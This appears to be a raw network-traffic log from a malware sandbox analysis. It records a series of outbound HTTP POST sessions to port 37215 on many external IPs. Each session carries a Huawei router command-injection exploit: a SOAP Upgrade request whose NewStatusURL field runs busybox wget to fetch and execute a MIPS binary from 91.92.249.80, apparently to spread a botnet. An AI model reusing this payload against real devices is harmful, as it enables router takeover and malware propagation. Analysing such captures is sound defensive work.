                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2284192.168.2.2336086197.248.158.4437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.666627884 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2285192.168.2.2337468179.2.76.11637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.666640997 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2286192.168.2.2351212157.222.242.12537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.666662931 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2287192.168.2.235900239.99.105.17437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.666790962 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2288192.168.2.235329841.200.254.23437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.666948080 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2289192.168.2.2333306197.222.90.14837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.666969061 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2290192.168.2.2353158157.43.88.737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.666976929 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2291192.168.2.2341288197.210.84.23337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.666991949 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2292192.168.2.2338476197.30.0.8737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.666991949 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2293192.168.2.2345718197.22.0.15737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.667011976 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2294192.168.2.2345384151.138.82.15137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.667027950 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
